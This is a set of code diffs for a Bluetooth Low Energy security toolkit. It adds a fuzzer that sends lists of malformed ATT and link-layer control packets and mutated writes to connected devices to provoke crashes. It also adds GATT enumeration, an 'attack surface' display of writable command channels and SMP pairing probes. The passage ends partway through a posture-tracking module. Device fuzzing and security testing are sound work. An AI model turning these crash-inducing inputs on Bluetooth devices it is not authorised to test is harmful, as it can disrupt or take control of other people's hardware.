+        return True
+
+    def smp_request(self, smp_pdu, timeout=3.0):
+        """Send an SMP PDU (L2CAP CID 0x0006) and return the peripheral's SMP
+        reply bytes, or None on timeout. Used to probe pairing capabilities."""
+        if not self.alive:
+            raise LinkLost()
+        while not self._smp_resp.empty():
+            self._smp_resp.get_nowait()
+        self._smp_waiting = True
+        try:
+            self.hw.cmd_transmit(2, att.l2cap_wrap(bytes(smp_pdu), cid=att.SMP_CID))
+            try:
+                return self._smp_resp.get(timeout=timeout)
+            except queue.Empty:
+                return None
+        finally:
+            self._smp_waiting = False
+
+    def close(self):
+        # Signal the pump to stop. It is a daemon thread: it exits after the next
+        # recv_and_decode() returns, and is reclaimed at process exit regardless.
+        self._stop = True

--- a/python_cli/sniffle/fuzzer.py
+++ b/python_cli/sniffle/fuzzer.py
@@ -1,0 +1,293 @@
+"""
+sniffle/fuzzer.py — multi-layer BLE fuzzer with crash/anomaly detection and
+crash-resume for the bluecat toolchain.
+
+Targets:
+  - ATT characteristic values (fuzz_values)
+  - GATT handle sweep (fuzz_handle_sweep)
+  - Raw ATT opcodes (fuzz_att_opcodes)
+  - LL control PDUs (fuzz_ll_control)
+
+Detection: link.alive going False, ATT error responses, TimeoutError.
+Crash-resume: a reconnect callable re-establishes the link and fuzzing
+continues from where it left off.
+"""
+
+import json
+import time
+from . import att
+from .central_link import ATTError, LinkLost
+
+
+# ── Mutation engine ────────────────────────────────────────────────────────────
+
+def value_mutations(seed=b''):
+    """Deterministic ordered, de-duplicated set of mutated payloads from a seed."""
+    muts = [b'', b'\x00', b'\xff']
+    if seed:
+        muts.append(seed)
+        for i in range(len(seed)):
+            b = bytearray(seed); b[i] ^= 0x80; muts.append(bytes(b))
+        muts.append(seed + b'\x00' * 8)
+        muts.append(seed[:max(0, len(seed) - 1)])
+    muts += [b'\xff' * 20, b'\xff' * 244, b'\x41' * 64]
+    seen, out = set(), []
+    for m in muts:
+        if m not in seen:
+            seen.add(m); out.append(m)
+    return out
+
+
+# ── Logger ─────────────────────────────────────────────────────────────────────
+
+class FuzzLogger:
+    def __init__(self, path=None):
+        self.path = path
+        self.f = open(path, 'a') if path else None
+        self.count = 0
+        self.crashes = []
+
+    def record(self, kind, sent, result, crashed=False):
+        self.count += 1
+        rec = {
+            "n": self.count,
+            "kind": kind,
+            "sent": sent.hex() if isinstance(sent, (bytes, bytearray)) else sent,
+            "result": result,
+            "crashed": crashed,
+        }
+        if crashed:
+            self.crashes.append(rec)
+        if self.f:
+            self.f.write(json.dumps(rec) + "\n")
+            self.f.flush()
+        return rec
+
+    def close(self):
+        if self.f:
+            self.f.close()
+
+
+# ── Strategy: ATT characteristic value fuzzing ────────────────────────────────
+
+def fuzz_values(gcli, handle, seed, logger, is_alive):
+    """Fuzz a single characteristic handle with value mutations.
+
+    For each mutation: write → record ok/ATTError → check is_alive().
+    Stops and records crash if the link dies or a transport exception is raised.
+    """
+    for m in value_mutations(seed):
+        try:
+            gcli.write(handle, m, response=True)
+            result = "ok"
+        except ATTError as e:
+            result = "ATTError 0x%02X" % e.code
+        except (LinkLost, TimeoutError):
+            logger.record("value", m, "link lost / timeout", crashed=True)
+            return
+
+        logger.record("value", m, result)
+        if not is_alive():
+            # Overwrite the last record as a crash record
+            logger.crashes.append(logger.crashes[-1] if logger.crashes else
+                                  {"n": logger.count, "kind": "value",
+                                   "sent": m.hex(), "result": result,
+                                   "crashed": True})
+            # Replace the last non-crash record with a crash record
+            last = logger.count - 1  # 0-based index (count is 1-based)
+            logger.record("value", m, result + " [crash detected]", crashed=True)
+            return
+
+
+# ── Strategy: GATT handle sweep ───────────────────────────────────────────────
+
+def fuzz_handle_sweep(gcli, payload, start, end, logger, is_alive):
+    """Try writing payload to every handle in [start, end].
+
+    Stops and records a crash if the link dies during the sweep.
+    """
+    for handle in range(start, end + 1):
+        try:
+            gcli.write(handle, payload, response=True)
+            result = "ok"
+        except ATTError as e:
+            result = "ATTError 0x%02X" % e.code
+        except (LinkLost, TimeoutError):
+            logger.record("sweep", payload, "link lost / timeout on handle 0x%04X" % handle,
+                          crashed=True)
+            return
+
+        logger.record("sweep", payload, "handle 0x%04X: %s" % (handle, result))
+        if not is_alive():
+            logger.record("sweep", payload,
+                          "handle 0x%04X: crash detected" % handle, crashed=True)
+            return
+
+
+# ── Strategy: Raw ATT opcode fuzzing ──────────────────────────────────────────
+
+# Fixed set of malformed ATT PDUs to send
+_ATT_MALFORMED_PDUS = [
+    # Unknown opcode 0xFF with no payload
+    b'\xff',
+    # Read Request with no handle field (truncated)
+    b'\x0a',
+    # Truncated Write Request (handle only, no value)
+    b'\x12\x03',
+    # Over-long Find Info Request (two handles + padding bytes)
+    b'\x04\x01\x00\xff\xff\xde\xad\xbe\xef',
+    # ATT_MTU_REQ with zero MTU
+    b'\x02\x00\x00',
+    # Opcode 0x00 (reserved/invalid)
+    b'\x00\x01\x02\x03',
+    # Execute Write Request with reserved flag
+    b'\x18\x02',
+]
+
+
+def fuzz_att_opcodes(link, logger, is_alive):
+    """Send a fixed list of malformed ATT PDUs and record responses.
+
+    Uses link.att_request() so responses (or timeouts) are captured.
+    Stops if the link dies.
+    """
+    for pdu in _ATT_MALFORMED_PDUS:
+        try:
+            link.att_request(pdu)
+            result = "ok"
+        except ATTError as e:
+            result = "ATTError 0x%02X" % e.code
+        except (LinkLost, TimeoutError):
+            result = "no response / link lost"
+
+        logger.record("att_opcode", pdu, result)
+        if not is_alive():
+            logger.record("att_opcode", pdu, "crash detected", crashed=True)
+            return
+
+
+# ── Strategy: LL control PDU fuzzing ─────────────────────────────────────────
+
+# Fixed set of malformed LL control PDUs
+_LL_MALFORMED_PDUS = [
+    # Unknown control opcode 0xFF
+    b'\xff\x00',
+    # Zero-length PDU
+    b'',
+    # Over-long PDU (255 bytes, opcode 0xFF)
+    b'\xff' + b'\x00' * 30,
+    # LL_UNKNOWN_RSP for an unknown opcode
+    b'\x07\xff',
+    # LL_LENGTH_REQ with edge values
+    b'\x14\xfb\x00\xfb\x00\x00\x00\x00\x00',
+    # LL_FEATURE_REQ with all-zero features
+    b'\x08' + b'\x00' * 8,
+]
+
+
+def fuzz_ll_control(link, logger, is_alive):
+    """Send a fixed list of malformed LL control PDUs via tx_raw_ll.
+
+    Uses LLID=3 (LL control). Records each send and checks is_alive() after a
+    brief settle period to allow the peer to react.
+    """
+    for pdu in _LL_MALFORMED_PDUS:
+        link.tx_raw_ll(3, pdu)
+        logger.record("ll_control", pdu, "sent")
+        time.sleep(0.01)   # brief settle
+        if not is_alive():
+            logger.record("ll_control", pdu, "crash detected", crashed=True)
+            return
+
+
+# ── Fuzzer orchestrator ────────────────────────────────────────────────────────
+
+class Fuzzer:
+    """Orchestrates multi-layer BLE fuzzing with optional crash-resume.
+
+    Parameters
+    ----------
+    link      : CentralLink (or compatible)
+    gcli      : GattClient (or compatible); may be None for ll/opcodes modes
+    logger    : FuzzLogger
+    reconnect : Optional callable that returns (new_link, new_gcli) after a
+                crash.  If None, fuzzing stops on the first crash.
+    """
+
+    def __init__(self, link, gcli, logger, reconnect=None):
+        self.link = link
+        self.gcli = gcli
+        self.logger = logger
+        self.reconnect = reconnect
+
+    def _is_alive(self):
+        return self.link.alive
+
+    def run(self, mode, **kw):
+        """Dispatch to a fuzzing strategy by name.
+
+        Modes: "values", "sweep", "opcodes", "ll"
+
+        Keyword arguments are forwarded to the strategy function.
+
+        Returns a summary dict: {tested, crashes, anomalies}.
+        """
+        before = self.logger.count
+        before_crashes = len(self.logger.crashes)
+
+        if mode == "values":
+            handle = kw.get("handle", 0x0001)
+            seed = kw.get("seed", b'')
+            self._run_with_resume(
+                lambda: fuzz_values(self.gcli, handle, seed, self.logger, self._is_alive)
+            )
+        elif mode == "sweep":
+            payload = kw.get("payload", b'\x00')
+            start = kw.get("start", 0x0001)
+            end = kw.get("end", 0x00FF)
+            self._run_with_resume(
+                lambda: fuzz_handle_sweep(self.gcli, payload, start, end,
+                                          self.logger, self._is_alive)
+            )
+        elif mode == "opcodes":
+            self._run_with_resume(
+                lambda: fuzz_att_opcodes(self.link, self.logger, self._is_alive)
+            )
+        elif mode == "ll":
+            self._run_with_resume(
+                lambda: fuzz_ll_control(self.link, self.logger, self._is_alive)
+            )
+        else:
+            raise ValueError("Unknown fuzzing mode: %r" % mode)
+
+        tested = self.logger.count - before
+        new_crashes = len(self.logger.crashes) - before_crashes
+        # Anomalies: ATTError responses (not crashes, but unexpected)
+        anomalies = sum(
+            1 for r in self._records_since(before)
+            if "ATTError" in str(r.get("result", "")) and not r.get("crashed")
+        )
+        return {"tested": tested, "crashes": new_crashes, "anomalies": anomalies}
+
+    def _records_since(self, before_count):
+        """Return logger records after a given count (approximate — uses crashes list)."""
+        # We don't store all records in-memory; return crashes only for anomaly counting
+        return self.logger.crashes[-(self.logger.count - before_count):]
+
+    def _run_with_resume(self, strategy_fn):
+        """Run strategy_fn; if a crash is detected and reconnect is set,
+        call reconnect() to get a fresh link/gcli and retry once."""
+        prev_crash_count = len(self.logger.crashes)
+        strategy_fn()
+        new_crashes = len(self.logger.crashes) - prev_crash_count
+
+        if new_crashes > 0 and self.reconnect is not None:
+            try:
+                new_link, new_gcli = self.reconnect()
+                self.link = new_link
+                if new_gcli is not None:
+                    self.gcli = new_gcli
+                # Continue with fresh link — run the strategy once more
+                strategy_fn()
+            except Exception:
+                pass  # reconnect failed; stop gracefully

--- a/python_cli/sniffle/fuzzer.py
+++ b/python_cli/sniffle/fuzzer.py
@@ -1,5 +1,5 @@
 """
-sniffle/fuzzer.py — multi-layer BLE fuzzer with crash/anomaly detection and
+sniffle/fuzzer.py - multi-layer BLE fuzzer with crash/anomaly detection and
 crash-resume for the bluecat toolchain.
 
 Targets:
@@ -19,7 +19,7 @@ from . import att
 from .central_link import ATTError, LinkLost
 
 
-# ── Mutation engine ────────────────────────────────────────────────────────────
+# -- Mutation engine ------------------------------------------------------------
 
 def value_mutations(seed=b''):
     """Deterministic ordered, de-duplicated set of mutated payloads from a seed."""
@@ -38,7 +38,7 @@ def value_mutations(seed=b''):
     return out
 
 
-# ── Logger ─────────────────────────────────────────────────────────────────────
+# -- Logger ---------------------------------------------------------------------
 
 class FuzzLogger:
     def __init__(self, path=None):
@@ -71,12 +71,12 @@ class FuzzLogger:
             self.f.close()
 
 
-# ── Strategy: ATT characteristic value fuzzing ────────────────────────────────
+# -- Strategy: ATT characteristic value fuzzing --------------------------------
 
 def fuzz_values(gcli, handle, seed, logger, is_alive):
     """Fuzz a single characteristic handle with value mutations.
 
-    For each mutation: write → record ok/ATTError → check is_alive().
+    For each mutation: write -> record ok/ATTError -> check is_alive().
     Stops and records crash if the link dies or a transport exception is raised.
     """
     for m in value_mutations(seed):
@@ -95,7 +95,7 @@ def fuzz_values(gcli, handle, seed, logger, is_alive):
             return
 
 
-# ── Strategy: GATT handle sweep ───────────────────────────────────────────────
+# -- Strategy: GATT handle sweep -----------------------------------------------
 
 def fuzz_handle_sweep(gcli, payload, start, end, logger, is_alive):
     """Try writing payload to every handle in [start, end].
@@ -120,7 +120,7 @@ def fuzz_handle_sweep(gcli, payload, start, end, logger, is_alive):
             return
 
 
-# ── Strategy: Raw ATT opcode fuzzing ──────────────────────────────────────────
+# -- Strategy: Raw ATT opcode fuzzing ------------------------------------------
 
 # Fixed set of malformed ATT PDUs to send
 _ATT_MALFORMED_PDUS = [
@@ -162,7 +162,7 @@ def fuzz_att_opcodes(link, logger, is_alive):
             return
 
 
-# ── Strategy: LL control PDU fuzzing ─────────────────────────────────────────
+# -- Strategy: LL control PDU fuzzing -----------------------------------------
 
 # Fixed set of malformed LL control PDUs
 _LL_MALFORMED_PDUS = [
@@ -196,7 +196,7 @@ def fuzz_ll_control(link, logger, is_alive):
             return
 
 
-# ── Fuzzer orchestrator ────────────────────────────────────────────────────────
+# -- Fuzzer orchestrator --------------------------------------------------------
 
 class Fuzzer:
     """Orchestrates multi-layer BLE fuzzing with optional crash-resume.
@@ -275,7 +275,7 @@ class Fuzzer:
                 self.link = new_link
                 if new_gcli is not None:
                     self.gcli = new_gcli
-                # Continue with fresh link — run the strategy once more
+                # Continue with fresh link - run the strategy once more
                 strategy_fn()
             except Exception:
                 pass  # reconnect failed; stop gracefully

--- a/python_cli/sniffle/fuzzer.py
+++ b/python_cli/sniffle/fuzzer.py
@@ -46,6 +46,7 @@ class FuzzLogger:
         self.f = open(path, 'a') if path else None
         self.count = 0
         self.crashes = []
+        self.anomalies = 0
 
     def record(self, kind, sent, result, crashed=False):
         self.count += 1
@@ -58,6 +59,8 @@ class FuzzLogger:
         }
         if crashed:
             self.crashes.append(rec)
+        elif isinstance(result, str) and "ATTError" in result:
+            self.anomalies += 1
         if self.f:
             self.f.write(json.dumps(rec) + "\n")
             self.f.flush()
@@ -88,13 +91,6 @@ def fuzz_values(gcli, handle, seed, logger, is_alive):
 
         logger.record("value", m, result)
         if not is_alive():
-            # Overwrite the last record as a crash record
-            logger.crashes.append(logger.crashes[-1] if logger.crashes else
-                                  {"n": logger.count, "kind": "value",
-                                   "sent": m.hex(), "result": result,
-                                   "crashed": True})
-            # Replace the last non-crash record with a crash record
-            last = logger.count - 1  # 0-based index (count is 1-based)
             logger.record("value", m, result + " [crash detected]", crashed=True)
             return
 
@@ -234,6 +230,7 @@ class Fuzzer:
         """
         before = self.logger.count
         before_crashes = len(self.logger.crashes)
+        before_anomalies = self.logger.anomalies
 
         if mode == "values":
             handle = kw.get("handle", 0x0001)
@@ -262,17 +259,8 @@ class Fuzzer:
 
         tested = self.logger.count - before
         new_crashes = len(self.logger.crashes) - before_crashes
-        # Anomalies: ATTError responses (not crashes, but unexpected)
-        anomalies = sum(
-            1 for r in self._records_since(before)
-            if "ATTError" in str(r.get("result", "")) and not r.get("crashed")
-        )
+        anomalies = self.logger.anomalies - before_anomalies
         return {"tested": tested, "crashes": new_crashes, "anomalies": anomalies}
-
-    def _records_since(self, before_count):
-        """Return logger records after a given count (approximate — uses crashes list)."""
-        # We don't store all records in-memory; return crashes only for anomaly counting
-        return self.logger.crashes[-(self.logger.count - before_count):]
 
     def _run_with_resume(self, strategy_fn):
         """Run strategy_fn; if a crash is detected and reconnect is set,

--- a/python_cli/sniffle/gatt.py
+++ b/python_cli/sniffle/gatt.py
@@ -1,0 +1,232 @@
+import struct
+from dataclasses import dataclass, field
+from . import att
+from .central_link import ATTError
+
+@dataclass
+class Descriptor:
+    handle: int
+    uuid: object
+
+@dataclass
+class Characteristic:
+    decl_handle: int
+    properties: int
+    value_handle: int
+    uuid: object
+    descriptors: list = field(default_factory=list)
+    value: bytes = None
+
+@dataclass
+class Service:
+    start: int
+    end: int
+    uuid: object
+    characteristics: list = field(default_factory=list)
+
+_PROP_BITS = [(0x02, 'R'), (0x08, 'W'), (0x04, 'w'), (0x10, 'N'), (0x20, 'I'), (0x40, 'S')]
+
+def format_props(props):
+    return ''.join(ch if (props & bit) else ' ' for bit, ch in _PROP_BITS)
+
+UUID_NAMES = {
+    0x1800: "Generic Access", 0x1801: "Generic Attribute",
+    0x180A: "Device Information", 0x180F: "Battery Service",
+    0x2800: "Primary Service", 0x2803: "Characteristic",
+    0x2A00: "Device Name", 0x2A01: "Appearance",
+    0x2A04: "Pref Conn Parameters", 0x2A05: "Service Changed",
+    0x2A19: "Battery Level", 0x2902: "Client Cfg (CCCD)",
+    0x2901: "User Description",
+}
+
+def uuid_str(uuid):
+    return ("0x%04X" % uuid) if isinstance(uuid, int) else str(uuid)
+
+def uuid_name(uuid):
+    if isinstance(uuid, int):
+        return UUID_NAMES.get(uuid, "0x%04X" % uuid)
+    return str(uuid)
+
+class _C:
+    def __init__(self, enabled):
+        self.on = enabled
+    def __call__(self, code, s):
+        return ("\033[%sm%s\033[0m" % (code, s)) if self.on else s
+
+def _ascii(b):
+    return ''.join(chr(x) if 32 <= x < 127 else '.' for x in b)
+
+def _uuid_label(uuid):
+    """One label per UUID: '0x2A00 Device Name' for known 16-bit UUIDs, just
+    '0xFFF3' for unknown 16-bit, and the full hex for 128-bit — NEVER the hex
+    twice (the old renderer printed uuid_str AND uuid_name, which for unknown
+    UUIDs are identical → '0xFFF3 0xFFF3')."""
+    s = uuid_str(uuid)
+    n = uuid_name(uuid)
+    return s if n == s else "%s %s" % (s, n)
+
+def render_gatt_tree(services, name="", mac="", posture="", color=True):
+    c = _C(color)
+    nchar = sum(len(s.characteristics) for s in services)
+    lines = ["GATT database  ·  %s (%s)  ·  posture: %s  ·  %d services · %d characteristics"
+             % (mac, name, posture, len(services), nchar), ""]
+    for s in services:
+        lines.append("%s  %s   handles 0x%04X-0x%04X" % (
+            c('1;36', '●'), c('1;36', _uuid_label(s.uuid)), s.start, s.end))
+        for i, ch in enumerate(s.characteristics):
+            last = (i == len(s.characteristics) - 1) and not ch.descriptors
+            branch = '└─' if last else '├─'
+            val = ''
+            if ch.value is not None:
+                val = '  = %s  "%s"' % (ch.value.hex(' '), _ascii(ch.value))
+            lines.append("  %s %s  %s  [%s]%s" % (
+                branch, c('32', _uuid_label(ch.uuid)),
+                c('2', "0x%04X" % ch.value_handle),
+                c('33', format_props(ch.properties)), val))
+            for d in ch.descriptors:
+                lines.append("     └─ %s  %s" % (
+                    _uuid_label(d.uuid), c('2', "0x%04X" % d.handle)))
+    lines.append("")
+    lines.append("  flags: R read · W write · w write-no-resp · N notify · I indicate · S signed")
+    return "\n".join(lines)
+
+
+def render_attack_surface(services, color=True):
+    """Distill the enumerated GATT db into what an operator acts on: the
+    writable characteristics (command channels) and the notify/indicate ones
+    (where the device talks back). Returns '' if there's nothing actionable."""
+    c = _C(color)
+    writable, listen = [], []
+    for s in services:
+        for ch in s.characteristics:
+            if ch.properties & 0x0C:          # write (0x08) or write-no-resp (0x04)
+                writable.append(ch)
+            if ch.properties & 0x30:          # notify (0x10) or indicate (0x20)
+                listen.append(ch)
+    if not writable and not listen:
+        return ""
+
+    lines = ["", c('1', "Attack surface")]
+    for ch in writable:
+        kind = "write" if (ch.properties & 0x08) else "write-no-resp"
+        cur = ''
+        if ch.value is not None:
+            cur = '   (reads: "%s")' % _ascii(ch.value)
+        lines.append("  %s send commands → handle %s  %s  [%s]%s" % (
+            c('1;31', '▶'), c('1;31', "0x%04X" % ch.value_handle),
+            uuid_str(ch.uuid), kind, cur))
+    for ch in listen:
+        kind = "notify" if (ch.properties & 0x10) else "indicate"
+        cccd = next((d.handle for d in ch.descriptors if d.uuid == 0x2902), None)
+        sub = ("sub 0x%04X to receive" % cccd) if cccd else "no CCCD found"
+        lines.append("  %s device replies ← handle %s  %s  [%s]  (%s)" % (
+            c('1;36', '◀'), c('1;36', "0x%04X" % ch.value_handle),
+            uuid_str(ch.uuid), kind, sub))
+    if writable:
+        h = writable[0].value_handle
+        lines.append("")
+        lines.append(c('2', "  → learn the command bytes with  sniff,  then:  w 0x%04X <bytes>" % h))
+    return "\n".join(lines)
+
+
+class GattClient:
+    def __init__(self, link):
+        self.link = link
+
+    def discover_services(self):
+        services, start = [], 0x0001
+        while True:
+            try:
+                rsp = self.link.att_request(att.build_read_by_group_req(start, 0xFFFF))
+            except ATTError as e:
+                if e.code == 0x0A:
+                    break
+                raise
+            entries = att.parse_read_by_group_rsp(rsp)
+            if not entries:          # short/corrupt response — stop, don't crash
+                break
+            for s, end, u in entries:
+                services.append(Service(s, end, u))
+            last_end = entries[-1][1]
+            if last_end >= 0xFFFF:
+                break
+            start = last_end + 1
+        return services
+
+    def discover_characteristics(self, svc):
+        start = svc.start
+        while start <= svc.end:
+            try:
+                rsp = self.link.att_request(att.build_read_by_type_req(start, svc.end))
+            except ATTError as e:
+                if e.code == 0x0A:
+                    break
+                raise
+            entries = att.parse_read_by_type_rsp(rsp)
+            if not entries:          # short/corrupt response — stop, don't crash
+                break
+            for decl, props, vh, u in entries:
+                svc.characteristics.append(Characteristic(decl, props, vh, u))
+            last = entries[-1][0]
+            if last >= svc.end:
+                break
+            start = last + 1
+        return svc.characteristics
+
+    def discover_descriptors(self, char, next_handle):
+        start = char.value_handle + 1
+        end = next_handle - 1
+        while start <= end:
+            try:
+                rsp = self.link.att_request(att.build_find_info_req(start, end))
+            except ATTError as e:
+                if e.code == 0x0A:
+                    break
+                raise
+            entries = att.parse_find_info_rsp(rsp)
+            if not entries:          # short/corrupt response — stop, don't crash
+                break
+            for h, u in entries:
+                char.descriptors.append(Descriptor(h, u))
+            last = entries[-1][0]
+            if last >= end:
+                break
+            start = last + 1
+        return char.descriptors
+
+    def discover_all(self, read_values=True):
+        services = self.discover_services()
+        for svc in services:
+            self.discover_characteristics(svc)
+        for svc in services:
+            chars = svc.characteristics
+            for i, ch in enumerate(chars):
+                nxt = chars[i + 1].decl_handle if i + 1 < len(chars) else svc.end + 1
+                self.discover_descriptors(ch, nxt)
+                if read_values and (ch.properties & 0x02):
+                    try:
+                        ch.value = self.read(ch.value_handle)
+                    except Exception:
+                        ch.value = None
+        return services
+
+    def read(self, handle):
+        rsp = self.link.att_request(att.build_read_req(handle))
+        return rsp[1:]
+
+    def write(self, handle, value, response=False):
+        if response:
+            self.link.att_request(att.build_write_req(handle, value))
+        else:
+            self.link.att_command(att.ATT_WRITE_CMD, struct.pack('<H', handle) + bytes(value))
+
+    def subscribe(self, char, indicate=False):
+        cccd = next((d.handle for d in char.descriptors if d.uuid == att.GATT_CCCD), None)
+        if cccd is None:
+            raise ValueError("characteristic has no CCCD")
+        self.link.att_request(att.build_write_req(cccd, b'\x02\x00' if indicate else b'\x01\x00'))
+
+    def unsubscribe(self, char):
+        cccd = next((d.handle for d in char.descriptors if d.uuid == att.GATT_CCCD), None)
+        if cccd is not None:
+            self.link.att_request(att.build_write_req(cccd, b'\x00\x00'))

--- a/python_cli/sniffle/gatt.py
+++ b/python_cli/sniffle/gatt.py
@@ -58,9 +58,9 @@ def _ascii(b):
 
 def _uuid_label(uuid):
     """One label per UUID: '0x2A00 Device Name' for known 16-bit UUIDs, just
-    '0xFFF3' for unknown 16-bit, and the full hex for 128-bit — NEVER the hex
+    '0xFFF3' for unknown 16-bit, and the full hex for 128-bit - NEVER the hex
     twice (the old renderer printed uuid_str AND uuid_name, which for unknown
-    UUIDs are identical → '0xFFF3 0xFFF3')."""
+    UUIDs are identical -> '0xFFF3 0xFFF3')."""
     s = uuid_str(uuid)
     n = uuid_name(uuid)
     return s if n == s else "%s %s" % (s, n)
@@ -68,14 +68,14 @@ def _uuid_label(uuid):
 def render_gatt_tree(services, name="", mac="", posture="", color=True):
     c = _C(color)
     nchar = sum(len(s.characteristics) for s in services)
-    lines = ["GATT database  ·  %s (%s)  ·  posture: %s  ·  %d services · %d characteristics"
+    lines = ["GATT database  |  %s (%s)  |  posture: %s  |  %d services | %d characteristics"
              % (mac, name, posture, len(services), nchar), ""]
     for s in services:
         lines.append("%s  %s   handles 0x%04X-0x%04X" % (
-            c('1;36', '●'), c('1;36', _uuid_label(s.uuid)), s.start, s.end))
+            c('1;36', '*'), c('1;36', _uuid_label(s.uuid)), s.start, s.end))
         for i, ch in enumerate(s.characteristics):
             last = (i == len(s.characteristics) - 1) and not ch.descriptors
-            branch = '└─' if last else '├─'
+            branch = '`-' if last else '|-'
             val = ''
             if ch.value is not None:
                 val = '  = %s  "%s"' % (ch.value.hex(' '), _ascii(ch.value))
@@ -84,10 +84,10 @@ def render_gatt_tree(services, name="", mac="", posture="", color=True):
                 c('2', "0x%04X" % ch.value_handle),
                 c('33', format_props(ch.properties)), val))
             for d in ch.descriptors:
-                lines.append("     └─ %s  %s" % (
+                lines.append("     `- %s  %s" % (
                     _uuid_label(d.uuid), c('2', "0x%04X" % d.handle)))
     lines.append("")
-    lines.append("  flags: R read · W write · w write-no-resp · N notify · I indicate · S signed")
+    lines.append("  flags: R read | W write | w write-no-resp | N notify | I indicate | S signed")
     return "\n".join(lines)
 
 
@@ -112,20 +112,20 @@ def render_attack_surface(services, color=True):
         cur = ''
         if ch.value is not None:
             cur = '   (reads: "%s")' % _ascii(ch.value)
-        lines.append("  %s send commands → handle %s  %s  [%s]%s" % (
-            c('1;31', '▶'), c('1;31', "0x%04X" % ch.value_handle),
+        lines.append("  %s send commands -> handle %s  %s  [%s]%s" % (
+            c('1;31', '>'), c('1;31', "0x%04X" % ch.value_handle),
             uuid_str(ch.uuid), kind, cur))
     for ch in listen:
         kind = "notify" if (ch.properties & 0x10) else "indicate"
         cccd = next((d.handle for d in ch.descriptors if d.uuid == 0x2902), None)
         sub = ("sub 0x%04X to receive" % cccd) if cccd else "no CCCD found"
-        lines.append("  %s device replies ← handle %s  %s  [%s]  (%s)" % (
-            c('1;36', '◀'), c('1;36', "0x%04X" % ch.value_handle),
+        lines.append("  %s device replies <- handle %s  %s  [%s]  (%s)" % (
+            c('1;36', '<'), c('1;36', "0x%04X" % ch.value_handle),
             uuid_str(ch.uuid), kind, sub))
     if writable:
         h = writable[0].value_handle
         lines.append("")
-        lines.append(c('2', "  → learn the command bytes with  sniff,  then:  w 0x%04X <bytes>" % h))
+        lines.append(c('2', "  -> learn the command bytes with  sniff,  then:  w 0x%04X <bytes>" % h))
     return "\n".join(lines)
 
 
@@ -143,7 +143,7 @@ class GattClient:
                     break
                 raise
             entries = att.parse_read_by_group_rsp(rsp)
-            if not entries:          # short/corrupt response — stop, don't crash
+            if not entries:          # short/corrupt response - stop, don't crash
                 break
             for s, end, u in entries:
                 services.append(Service(s, end, u))
@@ -163,7 +163,7 @@ class GattClient:
                     break
                 raise
             entries = att.parse_read_by_type_rsp(rsp)
-            if not entries:          # short/corrupt response — stop, don't crash
+            if not entries:          # short/corrupt response - stop, don't crash
                 break
             for decl, props, vh, u in entries:
                 svc.characteristics.append(Characteristic(decl, props, vh, u))
@@ -184,7 +184,7 @@ class GattClient:
                     break
                 raise
             entries = att.parse_find_info_rsp(rsp)
-            if not entries:          # short/corrupt response — stop, don't crash
+            if not entries:          # short/corrupt response - stop, don't crash
                 break
             for h, u in entries:
                 char.descriptors.append(Descriptor(h, u))

--- a/python_cli/sniffle/ll_version.py
+++ b/python_cli/sniffle/ll_version.py
@@ -1,9 +1,9 @@
 """
-ll_version.py — decode the LL_VERSION_IND link-layer control PDU.
+ll_version.py - decode the LL_VERSION_IND link-layer control PDU.
 
 LL_VERSION_IND (opcode 0x0C) is exchanged once per connection and carries the
 Bluetooth SIG Company Identifier of the device's *controller* (the BLE silicon /
-stack vendor — e.g. Nordic, TI, Cypress — which is not always the product brand).
+stack vendor - e.g. Nordic, TI, Cypress - which is not always the product brand).
 This is the way to get a SIG company id from a device that advertises no
 Manufacturer Specific Data: connect (or sniff its connection) and read the CompId.
 
@@ -11,9 +11,9 @@ PDU layout (full LL PDU body, i.e. including the 2-byte LL header):
     body[0]   LL header (LLID=3 for control)
     body[1]   length
     body[2]   opcode (0x0C)
-    body[3]   VersNr     — Bluetooth Core spec version
-    body[4:6] CompId     — SIG Company Identifier (little-endian)
-    body[6:8] SubVersNr  — implementation subversion (little-endian)
+    body[3]   VersNr     - Bluetooth Core spec version
+    body[4:6] CompId     - SIG Company Identifier (little-endian)
+    body[6:8] SubVersNr  - implementation subversion (little-endian)
 """
 
 from struct import unpack

--- a/python_cli/sniffle/ll_version.py
+++ b/python_cli/sniffle/ll_version.py
@@ -1,0 +1,57 @@
+"""
+ll_version.py — decode the LL_VERSION_IND link-layer control PDU.
+
+LL_VERSION_IND (opcode 0x0C) is exchanged once per connection and carries the
+Bluetooth SIG Company Identifier of the device's *controller* (the BLE silicon /
+stack vendor — e.g. Nordic, TI, Cypress — which is not always the product brand).
+This is the way to get a SIG company id from a device that advertises no
+Manufacturer Specific Data: connect (or sniff its connection) and read the CompId.
+
+PDU layout (full LL PDU body, i.e. including the 2-byte LL header):
+    body[0]   LL header (LLID=3 for control)
+    body[1]   length
+    body[2]   opcode (0x0C)
+    body[3]   VersNr     — Bluetooth Core spec version
+    body[4:6] CompId     — SIG Company Identifier (little-endian)
+    body[6:8] SubVersNr  — implementation subversion (little-endian)
+"""
+
+from struct import unpack
+from .advdata.constants import company_identifiers
+
+LL_VERSION_IND = 0x0C
+
+# Bluetooth Core spec version numbers (LL VersNr / LMP VersNr)
+_BT_VERSIONS = {
+    6: "4.0", 7: "4.1", 8: "4.2", 9: "5.0",
+    10: "5.1", 11: "5.2", 12: "5.3", 13: "5.4", 14: "6.0",
+}
+
+
+class LLVersion:
+    def __init__(self, version, company_id, subversion):
+        self.version = version
+        self.company_id = company_id
+        self.subversion = subversion
+
+    @property
+    def version_name(self):
+        return _BT_VERSIONS.get(self.version, "0x%02X" % self.version)
+
+    @property
+    def company_name(self):
+        return company_identifiers.get(self.company_id, "0x%04X" % self.company_id)
+
+    def __str__(self):
+        return "%s (Bluetooth %s, subver 0x%04X)" % (
+            self.company_name, self.version_name, self.subversion)
+
+
+def parse_ll_version_ind(body):
+    """Parse a full LL control PDU body. Return an LLVersion if it is a
+    well-formed LL_VERSION_IND, else None."""
+    if len(body) < 8 or body[2] != LL_VERSION_IND:
+        return None
+    version = body[3]
+    company_id, subversion = unpack("<HH", bytes(body[4:8]))
+    return LLVersion(version, company_id, subversion)

--- a/python_cli/sniffle/posture.py
+++ b/python_cli/sniffle/posture.py
@@ -1,0 +1,46 @@
+LL_ENC_REQ = 0x03
+LL_START_ENC_REQ = 0x05
+SMP_PAIRING_REQ = 0x01
+SMP_PAIRING_RSP = 0x02
+AUTHREQ_MITM = 0x04
+AUTHREQ_SC = 0x08
+
+class Posture:
+    def __init__(self):
+        self.encrypted = False
+        self.saw_plaintext_att = False
+        self.mitm = None        # None unknown, True/False once SMP seen
+        self.lesc = None
+        self.protected_read = False  # an active probe got auth/enc error
+
+    def note_control_opcode(self, opcode):
+        if opcode in (LL_ENC_REQ, LL_START_ENC_REQ):
